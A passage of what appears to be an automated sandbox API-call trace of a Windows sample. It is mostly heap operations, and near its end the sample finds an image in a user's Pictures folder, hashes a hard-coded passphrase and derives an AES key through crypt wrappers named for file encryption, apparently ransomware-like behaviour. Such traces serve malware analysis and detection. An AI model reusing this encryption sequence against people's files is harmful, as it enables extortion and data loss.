returned 0x43ca9b8 [0095.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0095.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0095.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359a68 [0095.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0095.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0095.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0095.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0095.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0095.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0095.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0095.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0095.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0095.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0095.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0095.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0095.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0095.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0095.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0095.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0095.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0095.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0095.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0095.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0095.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0095.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0095.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0095.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0095.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0095.715] FreeLibrary (hLibModule=0x772d0000) returned 1 [0095.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0095.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0095.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0095.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0095.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0095.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0095.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0095.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0095.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0095.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0095.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0095.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0095.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0095.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0095.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0095.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0095.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0095.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0095.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0095.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0095.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0095.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0095.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0095.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0095.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0095.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0095.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0095.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0095.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0095.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0095.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0095.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0095.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0095.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0095.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0095.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0095.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0095.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0095.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0095.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0095.717] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0095.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea508 | out: hHeap=0x1780000) returned 1 [0095.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0095.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0095.717] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0095.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0095.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0095.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0095.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0095.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0095.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0095.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0095.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0095.718] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0095.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0095.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0095.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0095.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0095.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0095.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0095.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0095.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0095.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0095.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0095.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0095.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca148 | out: hHeap=0x1780000) returned 1 [0095.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f20 | out: hHeap=0x1780000) returned 1 [0095.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0095.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0095.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0095.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0095.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0095.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0095.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0095.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0095.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43918f8 | out: hHeap=0x1780000) returned 1 [0095.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0095.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0095.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0095.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0095.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0095.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0095.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0095.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0095.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0095.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0095.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0095.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359a68 | out: hHeap=0x1780000) returned 1 [0095.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0095.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0095.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0095.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0095.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0095.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0095.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0095.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0095.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0095.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0095.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e95f0 | out: hHeap=0x1780000) returned 1 [0095.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0095.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0095.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0095.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0095.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0095.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0095.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0095.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0095.720] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0095.720] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.720] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca310, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0095.720] CloseHandle (hObject=0x298) returned 1 [0095.721] FreeLibrary (hLibModule=0x772d0000) returned 1 [0095.721] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0095.721] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\z6qa.jpg", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b717770, ftCreationTime.dwHighDateTime=0x1d5e73f, ftLastAccessTime.dwLowDateTime=0xdce5a1d0, ftLastAccessTime.dwHighDateTime=0x1d5e252, ftLastWriteTime.dwLowDateTime=0xdce5a1d0, ftLastWriteTime.dwHighDateTime=0x1d5e252, nFileSizeHigh=0x0, nFileSizeLow=0x123f1, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="z6qa.jpg", cAlternateFileName="")) returned 0x41abfc0 [0095.721] FindClose (in: hFindFile=0x41abfc0 | out: hFindFile=0x41abfc0) returned 1 [0095.721] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0095.721] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0095.721] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0095.721] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0095.722] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0095.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0095.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1797008, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0095.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0095.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796ec8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0095.722] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a5250) returned 1 [0095.723] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0095.723] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0095.723] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0095.723] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0095.723] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0095.723] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0095.723] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0095.723] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0095.723] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0095.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0095.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43caaf0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0095.723] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0095.723] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0095.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2848, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0095.724] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0095.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0095.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b18, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0095.724] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0095.724] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0095.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0095.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43caac0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0095.724] CryptHashData (hHash=0x41ac740, pbData=0x17e2bd8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0095.724] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0095.724] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0095.724] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0095.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0095.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cace8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0095.724] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac740, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac180) returned 1 [0095.725] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0095.725] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0095.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0095.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796fc8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0095.725] CryptDestroyHash (hHash=0x41ac740) returned 1 [0095.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0095.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea508 [0095.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0095.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0095.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0095.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0095.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0095.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 